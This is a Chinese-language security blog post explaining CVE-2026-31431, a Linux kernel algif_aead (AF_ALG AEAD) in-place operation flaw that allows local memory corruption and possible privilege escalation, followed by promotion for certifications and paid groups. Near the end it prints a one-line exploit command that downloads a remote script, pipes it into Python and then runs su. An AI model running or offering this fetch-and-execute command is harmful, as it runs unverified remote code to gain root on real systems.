前言:本文中涉及到的相关技术或工具仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担,如有侵权请私聊删除。知识星球和交流群在最下方。需要cn*d(中高)/c2n*d(高与支撑单位)/安全证书请联系vx咨询
Linux 内核 AF_ALG AEAD 实现因错误支持原地加密操作,导致内存处理缺陷,攻击者可通过构造请求触发内核内存破坏。
CVE-2026-31431 是 Linux 内核加密子系统中的一个安全漏洞,存在于 algif_aead 模块(AF_ALG 接口的 AEAD 实现)中。该漏洞源于对“原地(in-place)加密操作”的不当处理,引入了潜在的内存安全问题。
AF_ALG 是 Linux 提供给用户态程序访问内核加密能力的接口,而 AEAD(Authenticated Encryption with Associated Data)是一种同时提供机密性与完整性保护的加密模式。该漏洞正是发生在 AEAD socket 接口的数据处理逻辑中。
在引入 commit 72548b093ee3 后,内核尝试支持 AEAD 的“原地操作”(即输入缓冲区与输出缓冲区重叠的情况)。然而:
在 algif_aead 实现中,源数据与目标数据实际来自不同的内存映射区域 原地操作在该场景下没有实际意义 为支持该特性引入了额外复杂逻辑(尤其是 Associated Data 的复制处理)
这导致在特定情况下:
内存处理逻辑出现异常 数据复制路径存在不一致 可能触发内存破坏或未定义行为
本质上,这是一个由于不必要复杂性引入的内存处理缺陷(memory handling flaw)。
漏洞利用需要满足以下条件:
攻击者能够在本地系统执行代码(低权限用户即可)系统启用了 AF_ALG 接口使用 AEAD 加密接口(algif_aead)构造特定的输入数据触发异常内存路径攻击者在具备本地权限(低权限即可)的情况下,可以通过构造特定的 AF_ALG AEAD 操作触发该漏洞,从而可能导致:
内核内存损坏(memory corruption)系统崩溃(kernel panic)数据完整性破坏潜在的信息泄露或提权风险curl https://copy.fail/exp | python3 && su
https://github.com/theori-io/copy-fail-CVE-2026-31431/issues/6
https://xint.io/blog/copy-fail-linux-distributions
关于我们:
感谢各位大佬们关注-不秃头的安全,后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章,同时会组织不定期抽奖,希望能得到各位的关注与支持,考证请加联系vx咨询。
①Cn*d,NCC,NVDB🀄️高漏洞证书
②CNNVD中高\漏洞情报\ 一二三级支撑单位均可协助获得
③CISP、PTE/PTS、CISP-DSG、IRE/IRS、NISP一二级、PMP、CCSK、CISSP/CCSP、CISAW各种类、CCRC\CCSC、itil、软考中高级、CDSP各种类、CISA,oscp等等巨优惠。ISO27001、ITss服务项目经理报名等下证即可,证书组团报更便宜,可对公,可开专普票。以下是其他全部证书
【腾讯文档】【信息安全 数据安全 IT认证证书】~不秃头的安全Vx:Meditation0723
https://docs.qq.com/doc/DZmtOckpOakJrcFVv?#
想加群下方二维码,群过期或群满加下方vx拉:

1、维护更新src、cnxd、cnnxd专项漏洞知识库,包含原理、挖掘技巧、实战案例2、fafo/零零信安 高级会员key3、最新POC通用报告详情分享思路4、知识星球专属微信“内部圈子交流群”5、攻防演练资源分享(免杀、溯源、钓鱼等)6、新鲜工具分享7、不定期有工作招聘内推(工作/护网内推)8、19个专栏会持续更新~提前续费有优惠,好用不贵很实惠1、承接红蓝攻防、渗透、安全意识培训、基线核查及加固、应急响应、重保防守、代码审计等安全项目(须授权),需要攻防团队或岗位招聘都可代发、代招(灰黑勿扰);
2、各位安全老板需要文章推广的请私聊,承接合法合规推广文章发布,可直发、可按产品编辑推广;合作、推广代发、安全项目、岗位代招均可发布;
3、接受脱敏投稿,送一年知识星球及礼包。